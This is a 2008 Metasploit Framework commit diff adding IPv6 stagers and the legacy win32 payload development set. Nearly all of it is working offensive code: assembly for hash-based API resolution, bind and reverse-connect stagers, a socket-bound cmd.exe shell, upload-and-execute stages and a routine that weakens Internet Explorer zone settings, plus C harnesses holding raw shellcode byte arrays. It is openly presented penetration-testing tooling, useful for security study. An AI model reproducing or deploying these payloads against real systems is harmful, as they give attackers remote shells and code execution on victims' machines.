Adds initial support for IPv6, including two stager. Tested Meterpreter over IPv6 stages on XP and Vista. Using this is still tricky, I will add a wiki page tomorrow to explain the ScopeID stuff for link-local testing. This commit also includes the raw (oversized) assembler for the stagers as well as the entire old metasploit assembly set (useful for development).

git-svn-id: file:///home/svn/framework3/trunk@5635 4d416f70-5f16-0410-b530-b9f4589650da
2008-08-22 06:34:57 +00:00
parent 058e338028
commit d53dd66701
43 changed files with 1637 additions and 4 deletions
@@ -0,0 +1,18 @@
+This directory contains the win32 payload development environment used
+for creating the payloads in version 3 of the Metasploit Framework.
+
+The 'nasm' executable must be in your path to use the included build tool.
+
+The included 'build' script automatically creates a number of file types
+each time it used to compile a payload. These file types are:
+
+    - Native ELF executable
+    - Win32 PE executable
+    - Generated C source code
+    - Raw opcodes in ".bin" format
+
+The PE executable templates were developed by 'rix' and used with permission.
+
+To use this script, simply run ./build <name of payload>, where the name
+does not include the ".asm" suffix. To build win32_stage_api.asm, the 
+command line would be "./build win32_stage_api". 
@@ -0,0 +1,53 @@
+This directory contains the win32 payload development environment used
+for creating the payloads in version 2.2 of the Metasploit Framework.
+
+The 'nasm' executable must be in your path to use the included build tool.
+
+The included 'build' script automatically creates a number of file types
+each time it used to compile a payload. These file types are:
+
+    - Native ELF executable
+    - Win32 PE executable
+    - Generated C source code
+    - Raw opcodes in ".bin" format
+
+The PE executable templates were developed by 'rix' and used with permission.
+
+To use this script, simply run ./build <name of payload>, where the name
+does not include the ".asm" suffix. To build win32_stage_api.asm, the 
+command line would be "./build win32_stage_api". 
+
+The Win32 payloads are somewhat modular, each component includes other
+components to create the final payload. The dependency tree for the
+reverse connect shell is:
+
+win32_stage_api.asm
+  win32_stage_boot_winsock_conn.asm
+    win32_stage_boot_reverse.asm
+      win32_stage_shell.asm
+
+
+This allows the different components to be maintained invidually, shared 
+among multiple payloads, and converted into multi-stage payloads almost
+instantly. This release includes the following last-stage payloads:
+
+win32_stage_shell.asm
+    Executes cmd.exe with in/out redirected to socket, this is used by
+    the reverse connect and bind stagers.
+    
+win32_stage_winexec.asm
+    This payload simply executes an arbitrary command line, it can be used to
+    accomplish things such as ftp/download/execute sequences, adding a user
+    accounts, or just signaling that the exploit was successful.
+    
+win32_stage_inlineegg.asm
+    Writes GetProcAddress/LoadLibaryA address to socket, then reads and execs 
+    the rest of the payload from the socket. This allows us to send InlineEgg
+    generated payloads as a last stage.
+
+win32_stage_uploadexec.asm
+    Reads a file size from socket, then opens up a hidden/system local file
+    (c:\metasploit.exe) and downloads the executable from the socket into this
+    file. Once the download is complete, it then executes this file with in/out
+    redirected to the socket. This can be extremely useful when combined with
+    a self-extracting/executing rootkit or language intepreter (perl.exe).
@@ -0,0 +1,176 @@
+BITS   32
+GLOBAL _start
+
+_start:
+	cld
+	call  get_find_function
+strings:
+	db    "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0
+reg_values:
+	db    "1004120012011001"
+url:
+	db    "C:\progra~1\intern~1\iexplore -new", 0x0
+
+get_find_function:
+	call startup
+find_function:
+	pushad
+	mov   ebp, [esp + 0x24]
+	mov   eax, [ebp + 0x3c]
+	mov   edi, [ebp + eax + 0x78]
+	add   edi, ebp
+	mov   ecx, [edi + 0x18]
+	mov   ebx, [edi + 0x20]
+	add   ebx, ebp
+find_function_loop:
+	jecxz find_function_finished
+	dec   ecx
+	mov   esi, [ebx + ecx * 4]
+	add   esi, ebp
+	compute_hash:
+	xor   eax, eax
+	cdq
+compute_hash_again:
+	lodsb
+	test  al, al
+	jz    compute_hash_finished
+	ror   edx, 0xd
+	add   edx, eax
+	jmp   compute_hash_again
+compute_hash_finished:         
+find_function_compare:           
+	cmp   edx, [esp + 0x28]
+	jnz   find_function_loop
+	mov   ebx, [edi + 0x24]
+	add   ebx, ebp
+	mov   cx, [ebx + 2 * ecx]
+	mov   ebx, [edi + 0x1c]
+	add   ebx, ebp
+	mov   eax, [ebx + 4 * ecx]
+	add   eax, ebp
+	mov   [esp + 0x1c], eax
+find_function_finished:
+	popad
+	retn 8
+
+startup:
+	pop   edi
+	pop   ebx
+find_kernel32:
+	xor   edx, edx
+	mov   eax, [fs:edx+0x30]
+	test  eax, eax
+	js    find_kernel32_9x
+find_kernel32_nt:
+	mov   eax, [eax + 0x0c]
+	mov   esi, [eax + 0x1c]
+	lodsd
+	mov   eax, [eax + 0x8]
+	jmp   short find_kernel32_finished
+find_kernel32_9x:
+	mov   eax, [eax + 0x34]
+	add   eax, byte 0x7c
+	mov   eax, [eax + 0x3c]
+find_kernel32_finished:
+
+	mov   ebp, esp
+find_kernel32_symbols:
+	push  0x73e2d87e ; ExitProcess
+	push  eax
+	push  0x16b3fe72 ; CreateProcessA
+	push  eax
+	push  0xec0e4e8e ; LoadLibraryA
+	push  eax
+	call  edi
+	xchg  eax, esi
+	call  edi
+	mov   [ebp], eax
+	call  edi
+	mov   [ebp + 0x4], eax
+
+load_advapi32:
+	push  edx
+	push  0x32336970
+	push  0x61766461
+	push  esp
+	call  esi
+
+resolve_advapi32_symbols:
+	push  0x02922ba9
+	push  eax
+	push  0x2d1c9add
+	push  eax
+	call  edi
+	mov   [ebp + 0x8], eax
+	call  edi
+	xchg  eax, edi
+ 
+	xchg  esi, ebx
+open_key:
+	push  esp
+	push  esi
+	push  0x80000001
+	call  edi
+	pop   ebx
+	add   esi, byte (reg_values - strings)
+
+	push  eax
+	mov   edi, esp
+set_values:
+	cmp   byte [esi], 'C'
+	jz    initialize_structs
+	push  eax
+	lodsd
+	push  eax
+	mov   eax, esp
+	push  byte 0x4
+	push  edi
+	push  byte 0x4
+	push  byte 0x0
+	push  eax
+	push  ebx
+	call  [ebp + 0x8]
+	jmp   set_values
+
+; This is NT specific, but it lets us execute iexplore regardless
+; of what drive it's installed on so long as it's on the same drive
+; as the WINDOWS directory, which it should always be.
+fixup_drive_letter:
+	mov   cl, byte [0x7ffe0030]
+	mov   byte [esi], cl
+
+initialize_structs:
+	push  byte 0x54
+	pop   ecx
+	sub   esp, ecx
+	mov   edi, esp
+	push  edi
+	rep   stosb
+	pop   edi
+	mov   byte [edi], 0x44
+	inc   byte [edi + 0x2c]
+	inc   byte [edi + 0x2d]
+
+; set lpDesktop to WinSta0\Default so that this works with non-interactive services
+	push  0x00746c75
+   push  0x61666544
+   push  0x5c306174
+	push  0x536e6957
+	mov   [edi + 8], esp
+
+execute_process:
+	lea   ebx, [edi + 0x44]
+	push  ebx
+	push  edi
+	push  eax
+	push  eax
+	push  byte 0x10
+	push  eax
+	push  eax
+	push  eax
+	push  esi
+	push  eax
+	call  [ebp]
+
+exit_process:
+	call  [ebp + 0x4]	
@@ -0,0 +1,28 @@
+
+char code[] =
+"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
+"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
+"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
+"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
+"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
+"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
+"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
+"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"
+"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"
+"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"
+"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
+"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"
+"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
+"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
+"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89"
+"\xe1\x6a\x10\x51\x57\xff\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56"
+"\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57"
+"\xff\x55\x18\xff\xd3";
+
+
+int main(int argc, char **argv)
+{
+  int (*funct)();
+  funct = (int (*)()) code;
+  (int)(*funct)();
+}
@@ -0,0 +1,29 @@
+
+char code[] =
+"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
+"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
+"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
+"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
+"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
+"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
+"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
+"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"
+"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"
+"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"
+"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
+"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"
+"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
+"\x54\x68\x02\x02\x00\x00\xff\x55\x28\x31\xc0\x50\x50\x50\x6a\x06"
+"\x6a\x01\x6a\x17\xff\x55\x24\x89\xc7\xe8\x1c\x00\x00\x00\x17\x00"
+"\xff\xff\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x1b"
+"\x63\xff\xfe\x98\xbf\x36\x06\x00\x00\x00\x59\x6a\x1c\x51\x57\xff"
+"\x55\x20\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00"
+"\xff\x55\x0c\x89\xc3\x6a\x00\x56\x53\x57\xff\x55\x18\xff\xd3";
+
+
+int main(int argc, char **argv)
+{
+  int (*funct)();
+  funct = (int (*)()) code;
+  (int)(*funct)();
+}
@@ -0,0 +1,86 @@
+;      Title:  Win32 API Loader
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+[BITS 32]
+
+global _start
+_start:
+
+    call LKernel32Base
+
+LGetProcAddress:
+	push ebx
+	push ebp
+	push esi
+	push edi
+	mov ebp, [esp + 24]			
+	mov eax, [ebp + 0x3c]		
+	mov edx, [ebp + eax + 120]
+	add edx, ebp				
+	mov ecx, [edx + 24]			
+	mov ebx, [edx + 32]
+	add ebx, ebp
+
+LFnlp:
+	jecxz	LNtfnd
+	dec ecx
+	mov esi, [ebx + ecx * 4]
+	add esi, ebp				
+	xor edi, edi
+	cld
+
+LHshlp:
+	xor eax, eax
+	lodsb
+	cmp al, ah
+	je LFnd
+	ror edi, 13
+	add edi, eax
+	jmp short LHshlp
+
+LFnd:	
+	cmp edi, [esp + 20]
+	jnz LFnlp
+	mov ebx, [edx + 36]			
+	add ebx, ebp
+	mov cx, [ebx + 2 * ecx]		
+	mov ebx, [edx + 28]			
+	add ebx, ebp
+	mov eax, [ebx + 4 * ecx]	
+	add eax, ebp
+	jmp short LDone
+
+LNtfnd:
+	xor eax, eax
+
+LDone:
+	pop edi
+	pop esi
+	pop ebp
+	pop ebx
+	ret 8
+
+LKernel32Base:
+    pop esi
+    push byte 0x30
+    pop ecx
+    mov ebx, [fs:ecx]
+    mov ebx, [ebx + 0x0c] 
+    mov ebx, [ebx + 0x1c] 
+    mov ebx, [ebx]		  
+    mov ebx, [ebx + 0x08]
+
+    push ebx                ; kernel32.dll base
+    push 0xec0e4e8e         ; LoadLibraryA
+    call esi                ; GetProcAddress(kerne32.dll, LoadLibrary)
+    mov edi, eax
+	
+    push ebx                ; kernel32.dll base
+    push 0x91afca54         ; VirtualAlloc
+    call esi                ; GetProcAddress(kerne32.dll, VirtualAlloc)
+   
+    ; ebx = kernel32.dll base
+    ; esi = LGetProcAddress
+    ; edi = LoadLibraryA
+	; eax = VirtualAlloc
@@ -0,0 +1,33 @@
+;      Title:  Win32 Reverse Connect Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_bind.asm"
+
+
+LBind:
+    xor ebx, ebx
+    push ebx
+    push ebx
+    push dword 0x11220002 ; port 8721
+    mov eax, esp
+    push byte 0x10        ; length
+    push eax
+    push edi
+    call FN_BIND
+
+LListen:
+    push ebx
+    push edi
+    call FN_LISTEN
+
+LAccept:
+    push ebx
+    push esp
+    push edi
+    call FN_ACCEPT
+    mov edi, eax
@@ -0,0 +1,10 @@
+;      Title:  Win32 Reverse Connect Read Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+%include "win32_stage_inlineegg.asm"
@@ -0,0 +1,34 @@
+;      Title:  Win32 Reverse Connect Read Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+
+LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
+
+	push byte      0x40
+	pop esi
+	push esi                ; PAGE_EXECUTE_READWRITE=0x40
+
+	shl esi, 6              ; MEM_COMMIT=0x1000
+	push esi
+
+	shl esi, 8              ; 1MB
+	push esi
+	
+	push byte      0x00     ; NULL
+	call [ebp+12]
+	mov ebx, eax
+	
+
+LRecvLength: ; recv(s, buff, 4, 0)
+    push byte 0x00          ; flags
+    push 4096               ; length
+    push ebx                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    call ebx
@@ -0,0 +1,29 @@
+
+char code[] =
+"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
+"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
+"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
+"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
+"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
+"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
+"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
+"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"
+"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x27\x00\x00\x00"
+"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xe5\x49\x86\x49"
+"\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"
+"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x20\x51\xff\xd7\x89\xdf"
+"\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51\x53\xff\x34\x8f\xff\x55\x04"
+"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x30\x31\xc0"
+"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x2c\x89\xc7\x31\xdb\x53"
+"\x53\x68\x02\x00\x22\x11\x89\xe0\x6a\x10\x50\x57\xff\x55\x24\x53"
+"\x57\xff\x55\x28\x53\x54\x57\xff\x55\x20\x89\xc7\x6a\x40\x5e\x56"
+"\xc1\xe6\x06\x56\xc1\xe6\x08\x56\x6a\x00\xff\x55\x0c\x89\xc3\x6a"
+"\x00\x68\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3";
+
+
+int main(int argc, char **argv)
+{
+  int (*funct)();
+  funct = (int (*)()) code;
+  (int)(*funct)();
+}
@@ -0,0 +1,10 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_bind.asm"
+%include "win32_stage_shell.asm"
@@ -0,0 +1,37 @@
+;      Title:  Win32 Reverse Connect Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_conn.asm"
+
+; [ebp +  0] = kernel32.dll base
+; [ebp +  4] = LGetProcAddress
+; [ebp +  8] = LoadLibraryA
+; [ebp + 12] = VirtualAlloc
+; [ebp + 24] = recv
+; [ebp + 28] = send
+; [ebp + 32] = accept
+; [ebp + 36] = bind 
+; [ebp + 40] = connect
+; [ebp + 44] = WSASocketA
+; [ebp + 48] = WSAStartup
+; [ebp + 52] = Payload Length
+
+LConnect:
+    push 0x0100007f; host: 127.0.0.1
+    push 0x11220002 ; port: 8721 
+    mov ecx, esp
+    push byte 0x10
+    push ecx
+    push dword edi
+    call dword FN_CONNECT
+    pop ecx ; remove port
+    pop ecx ; remove host
+    
+    ; reconnect on failure
+    ; test eax, eax
+    ; jne short LConnect
@@ -0,0 +1,10 @@
+;      Title:  Win32 Reverse Connect Read Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_inlineegg.asm"
@@ -0,0 +1,26 @@
+;      Title:  Win32 Reverse Connect Read Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+
+
+LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
+	push byte      0x40     ; PAGE_EXECUTE_READWRITE
+	push dword   0x1000     ; MEM_COMMIT
+	push dword 0x100000     ; 1Mb
+	push byte      0x00     ; NULL
+	call [ebp+12]
+	mov ebx, eax
+	
+LRecvLength: ; recv(s, buff, 4, 0)
+    push byte 0x00          ; flags
+    push 4096               ; length
+    push ebx                ; buffer
+    push dword edi          ; socket
+    call FN_RECV            ; recv()
+    call ebx
@@ -0,0 +1,28 @@
+
+char code[] =
+"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"
+"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"
+"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"
+"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"
+"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"
+"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"
+"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e"
+"\x4e\x0e\xec\xff\xd6\x89\xc7\x53\x68\x54\xca\xaf\x91\xff\xd6\x81"
+"\xec\x00\x01\x00\x00\x50\x57\x56\x53\x89\xe5\xe8\x1f\x00\x00\x00"
+"\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4\x19\x70\xe9\xec\xf9\xaa\x60"
+"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
+"\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x05\x59"
+"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
+"\x54\xff\x37\xff\x55\x28\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
+"\xff\x55\x24\x89\xc7\x68\x7f\x00\x00\x01\x68\x02\x00\x22\x11\x89"
+"\xe1\x6a\x10\x51\x57\xff\x55\x20\x59\x59\x6a\x40\x68\x00\x10\x00"
+"\x00\x68\x00\x00\x10\x00\x6a\x00\xff\x55\x0c\x89\xc3\x6a\x00\x68"
+"\x00\x10\x00\x00\x53\x57\xff\x55\x18\xff\xd3";
+
+
+int main(int argc, char **argv)
+{
+  int (*funct)();
+  funct = (int (*)()) code;
+  (int)(*funct)();
+}
@@ -0,0 +1,10 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_shell.asm"
@@ -0,0 +1,11 @@
+;      Title:  Win32 Network Shell
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_reverse.asm"
+%include "win32_stage_revert.asm"
+%include "win32_stage_shell.asm"
@@ -0,0 +1,39 @@
+;      Title:  Win32 Reverse UDP "Connect" Payload
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_boot_winsock_conn_udp.asm"
+
+; [ebp +  0] = kernel32.dll base
+; [ebp +  4] = LGetProcAddress
+; [ebp +  8] = LoadLibraryA
+; [ebp + 12] = VirualAlloc
+; [ebp + 24] = recv
+; [ebp + 28] = send
+; [ebp + 32] = accept
+; [ebp + 36] = bind 
+; [ebp + 40] = connect
+; [ebp + 44] = WSASocketA
+; [ebp + 48] = WSAStartup
+; [ebp + 52] = Payload Length
+
+LConnect:
+    ;push 0xf401a8c0 ; 192.168.1.244
+    ;push 0xbc32a8c0 ; 192.168.50.187
+    push 0x0100007f; host: 127.0.0.1
+    push 0x11220002 ; port: 8721 
+    mov ecx, esp
+    push byte 0x10
+    push ecx
+    push dword edi
+    call dword FN_CONNECT
+    pop ecx ; remove port
+    pop ecx ; remove host
+    
+    ; reconnect on failure
+    ; test eax, eax
+    ; jne short LConnect
@@ -0,0 +1,77 @@
+;      Title:  Win32 Socket Initialization
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+sub esp, 0x100
+push eax    ; [ebp + 12] = VirtualAlloc
+push edi    ; [ebp +  8] = LoadLibraryA
+push esi    ; [ebp +  4] = LGetProcAddress
+push ebx    ; [ebp +  0] = kernel32.dll base
+            
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV     [ebp + 24]
+%define FN_SEND     [ebp + 28]
+%define FN_ACCEPT   [ebp + 32]
+%define FN_BIND     [ebp + 36]
+%define FN_LISTEN   [ebp + 40]
+%define FN_WSASOCK  [ebp + 44]
+%define FN_WSASTART [ebp + 48]
+
+LWSDataSegment:
+;========================
+dd 0x190      ; used by wsastartup
+dd 0xe71819b6 ; recv        [ebp + 24]
+dd 0xe97019a4 ; send        [ebp + 28]
+dd 0x498649e5 ; accept      [ebp + 32]
+dd 0xc7701aa4 ; bind        [ebp + 36]
+dd 0xe92eada4 ; listen      [ebp + 40]
+dd 0xadf509d9 ; WSASocketA  [ebp + 44]
+dd 0x3bfcedcb ; WSAStartup  [ebp + 48]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+    pop ebx             ; save address to data in ebx
+    lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
+    push ecx            ; push address of "WS2_32.DLL"
+	call edi            ; call LoadLibraryA("WS2_32.DLL")     
+    mov edi, ebx        ; store base of data section in edi
+    mov ebx, eax        ; store base of winsock in ebx
+    lea esi, [ebp + 20] ; store base of function table
+    push byte 0x07      ; load five functions by hash
+    pop ecx             ; configure the counter
+
+Looper:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx * 4]  ; function hash value
+    call [ebp + 4]              ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+
+LWSAStartup:                    ; WSAStartup (0x101, DATA)
+    sub esp, [edi]
+	push esp
+	push dword [edi]
+	call FN_WSASTART
+    xor eax, eax
+    
+LWSASocketA:                    ; WSASocketA (2,1,0,0,0,0) 
+	push eax
+	push eax
+	push eax
+	push eax
+	inc eax
+	push eax
+	inc eax
+	push eax
+	call FN_WSASOCK
+    mov edi, eax
@@ -0,0 +1,74 @@
+;      Title:  Win32 Socket Initialization (connect)
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+sub esp, 0x100
+push eax    ; [ebp + 12] = VirtualAlloc
+push edi    ; [ebp +  8] = LoadLibraryA
+push esi    ; [ebp +  4] = LGetProcAddress
+push ebx    ; [ebp +  0] = kernel32.dll base
+            
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV     [ebp + 24]
+%define FN_SEND     [ebp + 28]
+%define FN_CONNECT  [ebp + 32]
+%define FN_WSASOCK  [ebp + 36]
+%define FN_WSASTART [ebp + 40]
+
+LWSDataSegment:
+;========================
+dd 0x190      ; used by wsastartup
+dd 0xe71819b6 ; recv        [ebp + 24]
+dd 0xe97019a4 ; send        [ebp + 28]
+dd 0x60aaf9ec ; connect     [ebp + 32]
+dd 0xadf509d9 ; WSASocketA  [ebp + 36]
+dd 0x3bfcedcb ; WSAStartup  [ebp + 40]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+    pop ebx             ; save address to data in ebx
+    lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
+    push ecx            ; push address of "WS2_32.DLL"
+    call edi            ; call LoadLibraryA("WS2_32.DLL")     
+    mov edi, ebx        ; store base of data section in edi
+    mov ebx, eax        ; store base of winsock in ebx
+    lea esi, [ebp + 20] ; store base of function table
+    push byte 0x05      ; load five functions by hash
+    pop ecx             ; configure the counter
+
+Looper:    
+    push ecx                    ; save the counter
+    push ebx                    ; dll handle
+    push dword [edi + ecx * 4]  ; function hash value
+    call [ebp + 4]              ; find the address
+    pop ecx                     ; restore the counter
+    mov [esi + ecx * 4], eax    ; stack segment to store addresses
+    loop Looper
+
+LWSAStartup:                    ; WSAStartup (0x101, DATA)
+    sub esp, [edi]
+    push esp
+    push dword [edi]
+    call FN_WSASTART
+    xor eax, eax
+    
+LWSASocketA:                    ; WSASocketA (2,1,0,0,0,0) 
+    push eax
+    push eax
+    push eax
+    push eax
+    inc eax
+    push eax
+    inc eax
+    push eax
+    call FN_WSASOCK
+    mov edi, eax
@@ -0,0 +1,74 @@
+;      Title:  Win32 Socket Initialization (connect)
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
+;     Author:  hdm[at]metasploit.com
+
+
+
+[BITS 32]
+
+%include "win32_stage_api.asm"
+
+sub esp, 0x100
+push eax    ; [ebp + 12] = VirtualAlloc
+push edi    ; [ebp +  8] = LoadLibraryA
+push esi    ; [ebp +  4] = LGetProcAddress
+push ebx    ; [ebp +  0] = kernel32.dll base
+            
+mov ebp, esp
+call LLoadWinsock
+
+%define FN_RECV     [ebp + 24]
+%define FN_SEND     [ebp + 28]
+%define FN_CONNECT  [ebp + 32]
+%define FN_WSASOCK  [ebp + 36]
+%define FN_WSASTART [ebp + 40]
+
+LWSDataSegment:
+;========================
+dd 0x190      ; used by wsastartup
+dd 0xe71819b6 ; recv        [ebp + 24]
+dd 0xe97019a4 ; send        [ebp + 28]
+dd 0x60aaf9ec ; connect     [ebp + 32]
+dd 0xadf509d9 ; WSASocketA  [ebp + 36]
+dd 0x3bfcedcb ; WSAStartup  [ebp + 40]
+db "WS2_32", 0x00
+;========================
+
+LLoadWinsock:
+    pop ebx             ; save address to data in ebx
+    lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
+    push ecx            ; push address of "WS2_32.DLL"
+	call edi            ; call LoadLibraryA("WS2_32.DLL")     
